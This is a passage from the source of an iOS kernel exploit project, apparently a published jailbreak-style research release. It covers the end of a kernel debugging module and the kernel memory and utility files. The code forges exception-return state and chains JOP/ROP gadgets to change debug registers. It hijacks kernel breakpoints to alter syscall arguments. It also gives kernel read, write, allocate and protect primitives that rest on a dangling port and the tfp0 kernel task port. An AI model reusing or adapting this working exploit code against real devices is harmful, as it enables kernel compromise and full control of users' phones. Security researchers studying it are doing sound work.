eret_return_state.ss.ss_64.x[21] = act_context; 365 | 366 | // let's stay on the thread's actual kernel stack 367 | uint64_t thread_kernel_stack_top = rk64(thread_t_addr + koffset(KSTRUCT_OFFSET_THREAD_KSTACKPTR)); 368 | eret_return_state.ss.ss_64.sp = thread_kernel_stack_top; 369 | 370 | // the target place to eret to (see code snippet above) 371 | eret_return_state.ss.ss_64.pc = ksym(KSYMBOL_VALID_LINK_REGISTER); 372 | 373 | // the whole point of this, cpsr! this will be restored to SPSR_EL1 before the eret 374 | // see D1.6.4 of the armv8 manual 375 | // we want to return on to SP0 and to EL1 376 | // A,I,F should still be masked, D unmasked 377 | #define SPSR_A (1<<8) 378 | #define SPSR_I (1<<7) 379 | #define SPSR_F (1<<6) 380 | #define SPSR_EL1_SP0 (0x4) 381 | eret_return_state.ss.ss_64.cpsr = SPSR_A | SPSR_I | SPSR_F | SPSR_EL1_SP0; 382 | 383 | //uint64_t eret_return_state_kern = kmem_alloc_wired(sizeof(arm_context_t)); 384 | uint64_t eret_return_state_kern = early_kalloc(sizeof(arm_context_t)); 385 | kmemcpy(eret_return_state_kern, (uint64_t)&eret_return_state, sizeof(arm_context_t)); 386 | 387 | // make the arbitrary call 388 | kcall(ksym(KSYMBOL_X21_JOP_GADGET), 2, eret_return_state_kern, ksym(KSYMBOL_EXCEPTION_RETURN)); 389 | } 390 | 391 | 392 | /* 393 | we want to call this gadget: 394 | FFFFFFF0071E1998 MSR #0, c0, c2, #2, X8 ; [>] MDSCR_EL1 (Monitor Debug System Control Register) 395 | FFFFFFF0071E199C ISB // this a workaround for some errata... 396 | FFFFFFF0071E19A0 B loc_FFFFFFF0071E19F8 397 | ... 
398 | FFFFFFF0071E19F8 BL _ml_set_interrupts_enabled 399 | FFFFFFF0071E19FC ADD SP, SP, #0x220 400 | FFFFFFF0071E1A00 LDP X29, X30, [SP,#0x20+var_s0] 401 | FFFFFFF0071E1A04 LDP X20, X19, [SP,#0x20+var_10] 402 | FFFFFFF0071E1A08 LDP X28, X27, [SP+0x20+var_20],#0x30 403 | FFFFFFF0071E1A0C RET 404 | 405 | lets just use the ERET case to get full register control an run that on a little ROP stack which then 406 | returns to thread_exception_return 407 | 408 | */ 409 | void set_MDSCR_EL1_KDE(mach_port_t target_thread_port) { 410 | /* this state will be restored by an eret */ 411 | arm_context_t eret_return_state = {0}; 412 | 413 | // allocate a stack for the rop: 414 | //uint64_t rop_stack_kern_base = kmem_alloc_wired(0x4000); 415 | uint64_t rop_stack_kern_base = early_kalloc(0x1000); 416 | 417 | uint64_t rop_stack_kern_middle = rop_stack_kern_base + 0xc00; 418 | 419 | eret_return_state.ss.ss_64.sp = rop_stack_kern_middle; 420 | uint64_t rop_stack_kern_popped_base = rop_stack_kern_middle + 0x220; 421 | // x28, x27, x20, x19, fp, lr 422 | uint64_t popped_regs[] = {0, 0, 0, 0, 0x414243444546, ksym(KSYMBOL_THREAD_EXCEPTION_RETURN)}; // directly return back to userspace after this 423 | kmemcpy(rop_stack_kern_popped_base, (uint64_t)popped_regs, sizeof(popped_regs)); 424 | 425 | #define MDSCR_EL1_KDE (1<<13) 426 | eret_return_state.ss.ss_64.x[8] = MDSCR_EL1_KDE; 427 | 428 | // the target place to eret to 429 | eret_return_state.ss.ss_64.pc = ksym(KSYMBOL_SET_MDSCR_EL1_GADGET); 430 | 431 | // we want to return on to SP0 and to EL1 432 | // A,I,F should still be masked, D unmasked (here we could actually mask D?) 433 | #define SPSR_A (1<<8) 434 | #define SPSR_I (1<<7) 435 | #define SPSR_F (1<<6) 436 | #define SPSR_EL1_SP0 (0x4) 437 | eret_return_state.ss.ss_64.cpsr = SPSR_A | SPSR_I | SPSR_F | SPSR_EL1_SP0; 438 | 439 | //uint64_t eret_return_state_kern = kmem_alloc_wired(sizeof(arm_context_t)); 440 | uint64_t eret_return_state_kern = early_kalloc(sizeof(arm_context_t)); 441 | kmemcpy(eret_return_state_kern, (uint64_t)&eret_return_state, sizeof(arm_context_t)); 442 | 443 | // make the arbitrary call 444 | kcall(ksym(KSYMBOL_X21_JOP_GADGET), 2, eret_return_state_kern, ksym(KSYMBOL_EXCEPTION_RETURN)); 445 | 446 | printf("returned from trying to set the KDE bit\n"); 447 | 448 | // free the stack we used: 449 | //kmem_free(rop_stack_kern_base, 0x4000); 450 | } 451 | 452 | 453 | 454 | /* 455 | target_thread_port is the thread port for a thread which may or already has hit a kernel hw breakpoint. 456 | detect whether that is the case, and if so find the register state when the BP was hit. 457 | 458 | where to find stuff: 459 | 460 | userspace svc: EL0+SP0 -> EL1+SP1 (sync exception from lower exception level running aarch64) 461 | userspace state gets saved in thread->ACT_CONTEXT 462 | stack switched to thread's kernel stack pointer and SP0 selected 463 | does stuff which then hits kernel hw bp 464 | 465 | kernel hw bp: EL1+SP0 -> EL1+SP1 (sync exception from same exception level running on SP0) 466 | switch back to SP0 and push new arm_context_t on the there. point x21 to this saved state area. 467 | control flow reaches infinite loop 468 | 469 | fiq timer: EL1+SP0 -> EL1+SP1 (fiq interrupt from same exception level running on SP0) 470 | switch back to SP0 and push new arm_context_t on there. point x21 to there. 471 | then set sp to the interrupt stack. 
472 | 473 | schedule off: 474 | this will happen just before the fiq timer interrupt returns in return_to_kernel 475 | it will set sp back to x21 (as if to eret back to the previous exception level) then call ast_taken_kernel 476 | 477 | if the thread will be scheduled off just a small amount of state will be saved to the reserved area 478 | above the top of the thread's kernel stack, sufficient to get the thread back on the core and 479 | resume execution. 480 | 481 | 482 | +-----------------------------+ 483 | | | 484 | | struct thread_kernel_state | <-- *above* the top of thread kernel stack 485 | | | 486 | +> +=============================+ <-- top of thread kernel stack 487 | | | | 488 | | | syscall stack frames of | 489 | | | varying depth | 490 | | | (not user state) | 491 | | | | 492 | | +-----------------------------+ <-- kernel hw bp: EL1+SP0 -> EL1+SP1 (sync exception from same exception level running on SP0) 493 | | | | <-- saved state from when the bp was hit 494 | | | struct arm_context_t | 495 | | | .pc = address of hit bp | 496 | | +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+ 497 | | | | 498 | | | | 499 | | | stack frames from sync excp | 500 | | | to the infinite loop... | 501 | | | | 502 | | +-----------------------------+ <-- fiq timer: EL1+SP0 -> EL1+SP1 (fiq interrupt from same exception level running on SP0) 503 | | | struct arm_context_t | <-- saved state from the infinite loop before it was scheduled off 504 | | | .pc = addr of the infinite | 505 | | | loop instr | 506 | | |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+ 507 | | | | 508 | | | | 509 | | | | 510 | | | | 511 | +- +-----------------------------+ 512 | */ 513 | 514 | typedef void (*breakpoint_callback)(arm_context_t* context); 515 | 516 | volatile int syscall_complete = 0; 517 | 518 | void handle_kernel_bp_hits(mach_port_t target_thread_port, uint64_t looper_pc, uint64_t breakpoint, breakpoint_callback callback) { 519 | // get the target thread's thread_t 520 | uint64_t thread_port_addr = find_port_address(target_thread_port, MACH_MSG_TYPE_COPY_SEND); 521 | uint64_t thread_t_addr = rk64(thread_port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); 522 | 523 | while (1) { 524 | uint64_t looper_saved_state = 0; 525 | int found_it = 0; 526 | while (!found_it) { 527 | if (syscall_complete) { 528 | return; 529 | } 530 | // we've pinned ourself to the same core, so if we're running, it isn't... 531 | // in some ways this code is very racy, but when we actually have detected that the target 532 | // thread has hit the breakpoint it should be safe until we restart it 533 | // and up until then we don't do anything too dangerous... 
534 | 535 | 536 | // get the kstack pointer 537 | uint64_t kstackptr = rk64(thread_t_addr + koffset(KSTRUCT_OFFSET_THREAD_KSTACKPTR)); 538 | 539 | printf("kstackptr: %llx\n", kstackptr); 540 | 541 | // get the thread_kernel_state 542 | // the stack lives below kstackptr, and kstackptr itself points to a struct thread_kernel_state: 543 | // the first bit of that is just an arm_context_t: 544 | // this is the scheduled-off state 545 | arm_context_t saved_ksched_state = {0}; 546 | kmemcpy((uint64_t)&saved_ksched_state, kstackptr, sizeof(arm_context_t)); 547 | 548 | // get the saved stack pointer 549 | uint64_t sp = saved_ksched_state.ss.ss_64.sp; 550 | printf("sp: %llx\n", sp); 551 | 552 | if (sp == 0) { 553 | continue; 554 | } 555 | 556 | uint64_t stack[128] = {0}; 557 | 558 | // walk up from there and look for the saved state dumped by the fiq: 559 | // note that it won't be right at the bottom of the stack 560 | // instead there are the frames for: 561 | // ast_taken_kernel <-- above this is the saved state which will get restored when the hw bp spinner gets rescheduled 562 | // thread_block_reason 563 | // thread_invoke 564 | // machine_switch_context 565 | // Switch_context <-- the frame actually at the bottom of the stack 566 | 567 | // should probably walk those stack frame properly, but this will do... 568 | 569 | // grab the stack 570 | kmemcpy((uint64_t)&stack[0], sp, sizeof(stack)); 571 | //for (int i = 0; i < 128; i++) { 572 | // printf("%016llx\n", stack[i]); 573 | //} 574 | 575 | for (int i = 0; i < 128; i++) { 576 | uint64_t flavor_and_count = stack[i]; 577 | if (flavor_and_count != (ARM_SAVED_STATE64 | (((uint64_t)ARM_SAVED_STATE64_COUNT) << 32))) { 578 | continue; 579 | } 580 | 581 | arm_context_t* saved_state = (arm_context_t*)&stack[i]; 582 | 583 | if (saved_state->ss.ss_64.pc != looper_pc) { 584 | continue; 585 | } 586 | 587 | found_it = 1; 588 | looper_saved_state = sp + (i*sizeof(uint64_t)); 589 | printf("found the saved state probably at %llx\n", looper_saved_state); // should walk the stack properly.. 
590 | break; 591 | } 592 | 593 | if (!found_it) { 594 | printf("unable to find the saved scheduler tick state on the stack, waiting a bit then trying again...\n"); 595 | sleep(1); 596 | return; 597 | } 598 | 599 | } 600 | 601 | 602 | 603 | // now keep walking up and find the saved state for the code which hit the BP: 604 | uint64_t bp_hitting_state = looper_saved_state + sizeof(arm_context_t); 605 | found_it = 0; 606 | for (int i = 0; i < 1000; i++) { 607 | uint64_t flavor_and_count = rk64(bp_hitting_state); 608 | if (flavor_and_count != (ARM_SAVED_STATE64 | (((uint64_t)ARM_SAVED_STATE64_COUNT) << 32))) { 609 | bp_hitting_state += 8; 610 | continue; 611 | } 612 | 613 | arm_context_t bp_context; 614 | kmemcpy((uint64_t)&bp_context, bp_hitting_state, sizeof(arm_context_t)); 615 | 616 | for (int i = 0; i < 40; i++) { 617 | uint64_t* buf = (uint64_t*)&bp_context; 618 | printf("%016llx\n", buf[i]); 619 | } 620 | 621 | if (bp_context.ss.ss_64.pc != breakpoint) { 622 | printf("hummm, found an unexpected breakpoint: %llx\n", bp_context.ss.ss_64.pc); 623 | } 624 | 625 | found_it = 1; 626 | break; 627 | } 628 | 629 | if (!found_it) { 630 | printf("unable to find bp hitting state\n"); 631 | } 632 | 633 | // fix up the bp hitting state so it will continue (with whatever modifications we want:) 634 | // get a copy of the state: 635 | arm_context_t bp_context; 636 | kmemcpy((uint64_t)&bp_context, bp_hitting_state, sizeof(arm_context_t)); 637 | 638 | callback(&bp_context); 639 | 640 | // write that new state back: 641 | kmemcpy(bp_hitting_state, (uint64_t)&bp_context, sizeof(arm_context_t)); 642 | 643 | // unblock the looper: 644 | wk64(looper_saved_state + offsetof(arm_context_t, ss.ss_64.pc), ksym(KSYMBOL_SLEH_SYNC_EPILOG)); 645 | 646 | // when it runs again it should break out of the loop and continue the syscall 647 | // forces us off the core and hopefully it on: 648 | thread_switch(target_thread_port, 0, 0); 649 | swtch_pri(0); 650 | 651 | } 652 | } 653 | 654 | struct monitor_args { 655 | mach_port_t target_thread_port; 656 | uint64_t breakpoint; 657 | breakpoint_callback callback; 658 | }; 659 | 660 | 661 | void* monitor_thread(void* arg) { 662 | struct monitor_args* args = (struct monitor_args*)arg; 663 | 664 | printf("monitor thread running, pinning to core\n"); 665 | pin_current_thread(); 666 | printf("monitor thread pinned\n"); 667 | handle_kernel_bp_hits(args->target_thread_port, ksym(KSYMBOL_EL1_HW_BP_INFINITE_LOOP), args->breakpoint, args->callback); 668 | return NULL; 669 | } 670 | 671 | // this runs on the thread which will execute the target syscall to debug 672 | void run_syscall_with_breakpoint(uint64_t bp_address, breakpoint_callback callback, uint32_t syscall_number, uint32_t n_args, ...) { 673 | // pin this thread to the target cpu: 674 | pin_current_thread(); 675 | 676 | // set the Kernel Debug Enable bit of MDSCR_EL1: 677 | set_MDSCR_EL1_KDE(mach_thread_self()); 678 | 679 | // MDE will be set by the regular API for us 680 | 681 | // enable a hw debug breakpoint at bp_address 682 | // it won't fire because PSTATE.D will be set, but we'll deal with that in a bit! 
683 | 684 | // set a hardware bp on the thread using the proper API so that all the structures are already set up: 685 | struct arm64_debug_state state = {0}; 686 | state.bvr[0] = bp_address; 687 | #define BCR_BAS_ALL (0xf << 5) 688 | #define BCR_E (1 << 0) 689 | state.bcr[0] = BCR_BAS_ALL | BCR_E; // enabled 690 | kern_return_t err = thread_set_state(mach_thread_self(), 691 | ARM_DEBUG_STATE64, 692 | (thread_state_t)&state, 693 | sizeof(state)/4); 694 | 695 | // verify that it got set: 696 | memset(&state, 0, sizeof(state)); 697 | mach_msg_type_number_t count = sizeof(state)/4; 698 | err = thread_get_state(mach_thread_self(), 699 | ARM_DEBUG_STATE64, 700 | (thread_state_t)&state, 701 | &count); 702 | 703 | if (state.bvr[0] != bp_address) { 704 | printf("setting the bp address failed\n"); 705 | } 706 | 707 | 708 | // now go and find that thread's DebugData where those values are stored. 709 | 710 | uint64_t thread_port_addr = find_port_address(mach_thread_self(), MACH_MSG_TYPE_COPY_SEND); 711 | uint64_t thread_t_addr = rk64(thread_port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); 712 | 713 | printf("thread_t_addr: %llx\n", thread_t_addr); 714 | 715 | // read bvr[0] in that thread_t's DebugData: 716 | uint64_t DebugData = rk64(thread_t_addr + ACT_DEBUGDATA_OFFSET); 717 | //printf("DebugData: %llx\n", DebugData); 718 | 719 | uint64_t bvr0 = rk64(DebugData + offsetof(struct arm_debug_aggregate_state, ds64.bvr[0])); 720 | printf("bvr0 read from the DebugData: 0x%llx\n", bvr0); 721 | 722 | uint32_t bcr0 = rk32(DebugData + offsetof(struct arm_debug_aggregate_state, ds64.bcr[0])); 723 | printf("bcr0 read from the DebugData: 0x%08x\n", bcr0); 724 | 725 | // need to manually set this too in the bcr: 726 | #define ARM_DBG_CR_MODE_CONTROL_ANY (3 << 1) 727 | bcr0 |= ARM_DBG_CR_MODE_CONTROL_ANY; 728 | 729 | wk32(DebugData + offsetof(struct arm_debug_aggregate_state, ds64.bcr[0]), bcr0); 730 | 731 | printf("set ARM_DBG_CR_MODE_CONTROL_ANY\n"); 732 | // returning from the syscall should be enough to set it. 733 | 734 | struct monitor_args* margs = malloc(sizeof(struct monitor_args)); 735 | margs->target_thread_port = mach_thread_self(); 736 | margs->breakpoint = bp_address; 737 | margs->callback = callback; 738 | 739 | // spin up a thread to monitor when the bp is hit: 740 | pthread_t th; 741 | pthread_create(&th, NULL, monitor_thread, (void*)margs); 742 | printf("started monitor thread\n"); 743 | 744 | struct syscall_args sargs = {0}; 745 | sargs.number = syscall_number; 746 | va_list ap; 747 | va_start(ap, n_args); 748 | 749 | for (int i = 0; i < n_args; i++){ 750 | sargs.arg[i] = va_arg(ap, uint64_t); 751 | } 752 | 753 | va_end(ap); 754 | 755 | // now execute a syscall with PSTATE.D disabled: 756 | syscall_complete = 0; 757 | do_syscall_with_pstate_d_unmasked(&sargs); 758 | syscall_complete = 1; 759 | printf("syscall returned\n"); 760 | 761 | pthread_join(th, NULL); 762 | printf("monitor exited\n"); 763 | 764 | } 765 | 766 | void sys_write_breakpoint_handler(arm_context_t* state) { 767 | // we will have to skip it one instruction ahead because single step won't work... 
768 | state->ss.ss_64.pc += 4; 769 | 770 | // this means emulating what that instruction did: 771 | // LDR X8, [X8,#0x388] 772 | uint64_t val = rk64(state->ss.ss_64.x[8] + 0x388); 773 | state->ss.ss_64.x[8] = val; 774 | 775 | uint64_t uap = state->ss.ss_64.x[1]; 776 | char* replacer_string = strdup("a different string!\n"); 777 | wk64(uap+8, (uint64_t)replacer_string); 778 | wk64(uap+0x10, strlen(replacer_string)); 779 | } 780 | 781 | char* hello_wrld_str = "hellowrld!\n"; 782 | void test_kdbg() { 783 | run_syscall_with_breakpoint(ksym(KSYMBOL_WRITE_SYSCALL_ENTRYPOINT), // breakpoint address 784 | sys_write_breakpoint_handler, // breakpoint hit handler 785 | 4, // SYS_write 786 | 3, // 3 arguments 787 | 1, // stdout 788 | (uint64_t)hello_wrld_str, // "hellowrld!\n" 789 | strlen(hello_wrld_str)); // 11 790 | } 791 | 792 | 793 | 794 | 795 | 796 | 797 | 798 | 799 | 800 | 801 | 802 | 803 | 804 | 805 | 806 | -------------------------------------------------------------------------------- /async_wake_ios/kdbg.h: -------------------------------------------------------------------------------- 1 | #ifndef kdbg_h 2 | #define kdbg_h 3 | 4 | void test_kernel_bp(void); 5 | uint64_t pin_current_thread(void); 6 | void test_kdbg(void); 7 | void test_fp(void); 8 | 9 | #endif 10 | -------------------------------------------------------------------------------- /async_wake_ios/kmem.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include 6 | 7 | #include "kmem.h" 8 | #include "kutils.h" 9 | 10 | /***** mach_vm.h *****/ 11 | kern_return_t mach_vm_read( 12 | vm_map_t target_task, 13 | mach_vm_address_t address, 14 | mach_vm_size_t size, 15 | vm_offset_t *data, 16 | mach_msg_type_number_t *dataCnt); 17 | 18 | kern_return_t mach_vm_write( 19 | vm_map_t target_task, 20 | mach_vm_address_t address, 21 | vm_offset_t data, 22 | mach_msg_type_number_t dataCnt); 23 | 24 | kern_return_t mach_vm_read_overwrite( 25 | vm_map_t target_task, 26 | mach_vm_address_t address, 27 | mach_vm_size_t size, 28 | mach_vm_address_t data, 29 | mach_vm_size_t *outsize); 30 | 31 | kern_return_t mach_vm_allocate( 32 | vm_map_t target, 33 | mach_vm_address_t *address, 34 | mach_vm_size_t size, 35 | int flags); 36 | 37 | kern_return_t mach_vm_deallocate ( 38 | vm_map_t target, 39 | mach_vm_address_t address, 40 | mach_vm_size_t size); 41 | 42 | kern_return_t mach_vm_protect ( 43 | vm_map_t target_task, 44 | mach_vm_address_t address, 45 | mach_vm_size_t size, 46 | boolean_t set_maximum, 47 | vm_prot_t new_protection); 48 | 49 | // the exploit bootstraps the full kernel memory read/write with a fake 50 | // task which just allows reading via the bsd_info->pid trick 51 | // this first port is kmem_read_port 52 | mach_port_t kmem_read_port = MACH_PORT_NULL; 53 | void prepare_rk_via_kmem_read_port(mach_port_t port) { 54 | kmem_read_port = port; 55 | } 56 | 57 | mach_port_t tfp0 = MACH_PORT_NULL; 58 | void prepare_rwk_via_tfp0(mach_port_t port) { 59 | tfp0 = port; 60 | } 61 | 62 | int have_kmem_read() { 63 | return (kmem_read_port != MACH_PORT_NULL) || (tfp0 != MACH_PORT_NULL); 64 | } 65 | 66 | int have_kmem_write() { 67 | return (tfp0 != MACH_PORT_NULL); 68 | } 69 | 70 | uint32_t rk32_via_kmem_read_port(uint64_t kaddr) { 71 | kern_return_t err; 72 | if (kmem_read_port == MACH_PORT_NULL) { 73 | printf("kmem_read_port not set, have you called prepare_rk?\n"); 74 | sleep(10); 75 | exit(EXIT_FAILURE); 76 | } 77 | 78 | mach_port_context_t context = 
(mach_port_context_t)kaddr - 0x10; 79 | err = mach_port_set_context(mach_task_self(), kmem_read_port, context); 80 | if (err != KERN_SUCCESS) { 81 | printf("error setting context off of dangling port: %x %s\n", err, mach_error_string(err)); 82 | sleep(10); 83 | exit(EXIT_FAILURE); 84 | } 85 | 86 | // now do the read: 87 | uint32_t val = 0; 88 | err = pid_for_task(kmem_read_port, (int*)&val); 89 | if (err != KERN_SUCCESS) { 90 | printf("error calling pid_for_task %x %s", err, mach_error_string(err)); 91 | sleep(10); 92 | exit(EXIT_FAILURE); 93 | } 94 | 95 | return val; 96 | } 97 | 98 | uint32_t rk32_via_tfp0(uint64_t kaddr) { 99 | kern_return_t err; 100 | uint32_t val = 0; 101 | mach_vm_size_t outsize = 0; 102 | err = mach_vm_read_overwrite(tfp0, 103 | (mach_vm_address_t)kaddr, 104 | (mach_vm_size_t)sizeof(uint32_t), 105 | (mach_vm_address_t)&val, 106 | &outsize); 107 | if (err != KERN_SUCCESS){ 108 | printf("tfp0 read failed %s addr: 0x%llx err:%x port:%x\n", mach_error_string(err), kaddr, err, tfp0); 109 | sleep(3); 110 | return 0; 111 | } 112 | 113 | if (outsize != sizeof(uint32_t)){ 114 | printf("tfp0 read was short (expected %lx, got %llx\n", sizeof(uint32_t), outsize); 115 | sleep(3); 116 | return 0; 117 | } 118 | return val; 119 | } 120 | 121 | uint32_t rk32(uint64_t kaddr) { 122 | if (tfp0 != MACH_PORT_NULL) { 123 | return rk32_via_tfp0(kaddr); 124 | } 125 | 126 | if (kmem_read_port != MACH_PORT_NULL) { 127 | return rk32_via_kmem_read_port(kaddr); 128 | } 129 | 130 | printf("attempt to read kernel memory but no kernel memory read primitives available\n"); 131 | sleep(3); 132 | 133 | return 0; 134 | } 135 | 136 | uint64_t rk64(uint64_t kaddr) { 137 | uint64_t lower = rk32(kaddr); 138 | uint64_t higher = rk32(kaddr+4); 139 | uint64_t full = ((higher<<32) | lower); 140 | return full; 141 | } 142 | 143 | void wkbuffer(uint64_t kaddr, void* buffer, uint32_t length) { 144 | if (tfp0 == MACH_PORT_NULL) { 145 | printf("attempt to write to kernel memory before any kernel memory write primitives available\n"); 146 | sleep(3); 147 | return; 148 | } 149 | 150 | kern_return_t err; 151 | err = mach_vm_write(tfp0, 152 | (mach_vm_address_t)kaddr, 153 | (vm_offset_t)buffer, 154 | (mach_msg_type_number_t)length); 155 | 156 | if (err != KERN_SUCCESS) { 157 | printf("tfp0 write failed: %s %x\n", mach_error_string(err), err); 158 | return; 159 | } 160 | } 161 | 162 | void rkbuffer(uint64_t kaddr, void* buffer, uint32_t length) { 163 | kern_return_t err; 164 | uint32_t val = 0; 165 | mach_vm_size_t outsize = 0; 166 | err = mach_vm_read_overwrite(tfp0, 167 | (mach_vm_address_t)kaddr, 168 | (mach_vm_size_t)length, 169 | (mach_vm_address_t)buffer, 170 | &outsize); 171 | if (err != KERN_SUCCESS){ 172 | printf("tfp0 read failed %s addr: 0x%llx err:%x port:%x\n", mach_error_string(err), kaddr, err, tfp0); 173 | sleep(3); 174 | return; 175 | } 176 | 177 | if (outsize != length){ 178 | printf("tfp0 read was short (expected %lx, got %llx\n", sizeof(uint32_t), outsize); 179 | sleep(3); 180 | return; 181 | } 182 | } 183 | 184 | const uint64_t kernel_address_space_base = 0xffff000000000000; 185 | void kmemcpy(uint64_t dest, uint64_t src, uint32_t length) { 186 | if (dest >= kernel_address_space_base) { 187 | // copy to kernel: 188 | wkbuffer(dest, (void*) src, length); 189 | } else { 190 | // copy from kernel 191 | rkbuffer(src, (void*)dest, length); 192 | } 193 | } 194 | 195 | void wk32(uint64_t kaddr, uint32_t val) { 196 | if (tfp0 == MACH_PORT_NULL) { 197 | printf("attempt to write to kernel memory before any 
kernel memory write primitives available\n"); 198 | sleep(3); 199 | return; 200 | } 201 | 202 | kern_return_t err; 203 | err = mach_vm_write(tfp0, 204 | (mach_vm_address_t)kaddr, 205 | (vm_offset_t)&val, 206 | (mach_msg_type_number_t)sizeof(uint32_t)); 207 | 208 | if (err != KERN_SUCCESS) { 209 | printf("tfp0 write failed: %s %x\n", mach_error_string(err), err); 210 | return; 211 | } 212 | } 213 | 214 | void wk64(uint64_t kaddr, uint64_t val) { 215 | uint32_t lower = (uint32_t)(val & 0xffffffff); 216 | uint32_t higher = (uint32_t)(val >> 32); 217 | wk32(kaddr, lower); 218 | wk32(kaddr+4, higher); 219 | } 220 | 221 | uint64_t kmem_alloc(uint64_t size) { 222 | if (tfp0 == MACH_PORT_NULL) { 223 | printf("attempt to allocate kernel memory before any kernel memory write primitives available\n"); 224 | sleep(3); 225 | return 0; 226 | } 227 | 228 | kern_return_t err; 229 | mach_vm_address_t addr = 0; 230 | mach_vm_size_t ksize = round_page_kernel(size); 231 | err = mach_vm_allocate(tfp0, &addr, ksize, VM_FLAGS_ANYWHERE); 232 | if (err != KERN_SUCCESS) { 233 | printf("unable to allocate kernel memory via tfp0: %s %x\n", mach_error_string(err), err); 234 | sleep(3); 235 | return 0; 236 | } 237 | return addr; 238 | } 239 | 240 | uint64_t kmem_alloc_wired(uint64_t size) { 241 | if (tfp0 == MACH_PORT_NULL) { 242 | printf("attempt to allocate kernel memory before any kernel memory write primitives available\n"); 243 | sleep(3); 244 | return 0; 245 | } 246 | 247 | kern_return_t err; 248 | mach_vm_address_t addr = 0; 249 | mach_vm_size_t ksize = round_page_kernel(size); 250 | 251 | printf("vm_kernel_page_size: %lx\n", vm_kernel_page_size); 252 | 253 | err = mach_vm_allocate(tfp0, &addr, ksize+0x4000, VM_FLAGS_ANYWHERE); 254 | if (err != KERN_SUCCESS) { 255 | printf("unable to allocate kernel memory via tfp0: %s %x\n", mach_error_string(err), err); 256 | sleep(3); 257 | return 0; 258 | } 259 | 260 | printf("allocated address: %llx\n", addr); 261 | 262 | addr += 0x3fff; 263 | addr &= ~0x3fffull; 264 | 265 | printf("address to wire: %llx\n", addr); 266 | 267 | err = mach_vm_wire(fake_host_priv(), tfp0, addr, ksize, VM_PROT_READ|VM_PROT_WRITE); 268 | if (err != KERN_SUCCESS) { 269 | printf("unable to wire kernel memory via tfp0: %s %x\n", mach_error_string(err), err); 270 | sleep(3); 271 | return 0; 272 | } 273 | return addr; 274 | } 275 | 276 | void kmem_free(uint64_t kaddr, uint64_t size) { 277 | return; 278 | if (tfp0 == MACH_PORT_NULL) { 279 | printf("attempt to deallocate kernel memory before any kernel memory write primitives available\n"); 280 | sleep(3); 281 | return; 282 | } 283 | 284 | kern_return_t err; 285 | mach_vm_size_t ksize = round_page_kernel(size); 286 | err = mach_vm_deallocate(tfp0, kaddr, ksize); 287 | if (err != KERN_SUCCESS) { 288 | printf("unable to deallocate kernel memory via tfp0: %s %x\n", mach_error_string(err), err); 289 | sleep(3); 290 | return; 291 | } 292 | } 293 | 294 | void kmem_protect(uint64_t kaddr, uint32_t size, int prot) { 295 | if (tfp0 == MACH_PORT_NULL) { 296 | printf("attempt to change protection of kernel memory before any kernel memory write primitives available\n"); 297 | sleep(3); 298 | return; 299 | } 300 | kern_return_t err; 301 | err = mach_vm_protect(tfp0, (mach_vm_address_t)kaddr, (mach_vm_size_t)size, 0, (vm_prot_t)prot); 302 | if (err != KERN_SUCCESS) { 303 | printf("unable to change protection of kernel memory via tfp0: %s %x\n", mach_error_string(err), err); 304 | sleep(3); 305 | return; 306 | } 307 | } 308 | 
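
The primitives above compose into everything the rest of the repo needs: rk64/wk64 are just two adjacent 32-bit accesses, and kmemcpy picks its direction by checking whether the destination is a kernel address. Below is a minimal usage sketch; it is not part of the repo and assumes the exploit has already handed back a tfp0 send right (the tfp0_port name is hypothetical).

#include <stdio.h>
#include <mach/mach.h>
#include "kmem.h"

// usage sketch (hypothetical helper, not part of the repo): wire up the
// tfp0-backed primitives, then do a write/read round trip against a fresh
// kernel allocation to confirm they work
void kmem_smoke_test(mach_port_t tfp0_port) {
  prepare_rwk_via_tfp0(tfp0_port);

  uint64_t scratch = kmem_alloc(0x1000);        // rounded up to the kernel page size
  wk64(scratch, 0x4141414141414141);
  printf("readback: 0x%llx\n", rk64(scratch));  // expect 0x4141414141414141
  kmem_free(scratch, 0x1000);                   // currently a no-op (early return above)
}
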
-------------------------------------------------------------------------------- /async_wake_ios/kmem.h: -------------------------------------------------------------------------------- 1 | #ifndef kmem_h 2 | #define kmem_h 3 | 4 | #include 5 | 6 | uint32_t rk32(uint64_t kaddr); 7 | uint64_t rk64(uint64_t kaddr); 8 | 9 | void wk32(uint64_t kaddr, uint32_t val); 10 | void wk64(uint64_t kaddr, uint64_t val); 11 | 12 | void wkbuffer(uint64_t kaddr, void* buffer, uint32_t length); 13 | void rkbuffer(uint64_t kaddr, void* buffer, uint32_t length); 14 | 15 | void kmemcpy(uint64_t dest, uint64_t src, uint32_t length); 16 | 17 | void kmem_protect(uint64_t kaddr, uint32_t size, int prot); 18 | 19 | uint64_t kmem_alloc(uint64_t size); 20 | uint64_t kmem_alloc_wired(uint64_t size); 21 | void kmem_free(uint64_t kaddr, uint64_t size); 22 | 23 | void prepare_rk_via_kmem_read_port(mach_port_t port); 24 | void prepare_rwk_via_tfp0(mach_port_t port); 25 | 26 | // query whether kmem read or write is present 27 | int have_kmem_read(void); 28 | int have_kmem_write(void); 29 | 30 | #endif 31 | -------------------------------------------------------------------------------- /async_wake_ios/kutils.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | #include 5 | 6 | #include "kutils.h" 7 | #include "kmem.h" 8 | #include "find_port.h" 9 | #include "symbols.h" 10 | 11 | uint64_t cached_task_self_addr = 0; 12 | uint64_t task_self_addr() { 13 | if (cached_task_self_addr == 0) { 14 | cached_task_self_addr = find_port_address(mach_task_self(), MACH_MSG_TYPE_COPY_SEND); 15 | printf("task self: 0x%llx\n", cached_task_self_addr); 16 | } 17 | return cached_task_self_addr; 18 | } 19 | 20 | uint64_t ipc_space_kernel() { 21 | return rk64(task_self_addr() + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER)); 22 | } 23 | 24 | uint64_t current_thread() { 25 | uint64_t thread_port = find_port_address(mach_thread_self(), MACH_MSG_TYPE_COPY_SEND); 26 | return rk64(thread_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); 27 | } 28 | 29 | uint64_t find_kernel_base() { 30 | uint64_t hostport_addr = find_port_address(mach_host_self(), MACH_MSG_TYPE_COPY_SEND); 31 | uint64_t realhost = rk64(hostport_addr + 